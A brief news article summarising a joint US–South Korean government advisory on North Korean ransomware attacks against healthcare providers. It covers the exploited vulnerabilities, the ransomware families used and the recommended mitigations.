A new cybersecurity advisory issued by the CISA in collaboration with the NSA, the FBI, the HHS, the ROK National Intelligence Service, and the ROK Defense Security Agency has warned that North Korean hackers are involved in ongoing ransomware attacks against healthcare systems in South Korea and the U.S.
Setting up the stage
According to the advisory, the modus operandi of the attacks includes North Korean hackers acquiring and purchasing infrastructure to conceal their identities.
This includes using fake personas and accounts and illegally obtained cryptocurrency to hide their operations.
They are also using VPN services, (VPS, or third-party IP addresses to conceal the origin of the attack.
Hackers infiltrate targets by exploiting vulnerabilities—Log4Shell (CVE-2021-44228), remote code execution flaw in SonicWall appliances (CVE-2021-20038), and admin password disclosure flaw in TerraMaster NAS products (CVE-2022-24990)—that allow access and privilege escalation on the target networks.
The ransomware is distributed via trojanized files for ‘X-Popup,’ an open-source messenger commonly used by employees of small and medium hospitals in South Korea.
Ransomware used in attacks
While the North Korean hackers have been linked to Maui and H0lyGh0st ransomware strains, the advisory notes that they have also been observed using publicly available ransomware tools for encryption.
These include BitLocker, Deadbolt, ech0raix, GonnaCry, Hidden Tear, Jigsaw, LockBit 2.0, My Little, NxRansomware, Ryuk, and YourRansom.
In the last stage of the attack, the attackers demand payment in Bitcoin cryptocurrency. They use Proton Mail accounts to communicate with victims.
Conclusion
The CISA highlights that the revenue from these ransomware operations is used to support further cyber operations targeting the U.S. and South Korean governments. Organizations can mitigate these attacks by understanding the threat actors’ attack patterns through IOCs shared by the CISA. The agency has also shared a list of recommendations and mitigation measures to stay safe. These include using MFA for account protection, deploying network traffic monitoring tools, and applying the available security updates on all software products.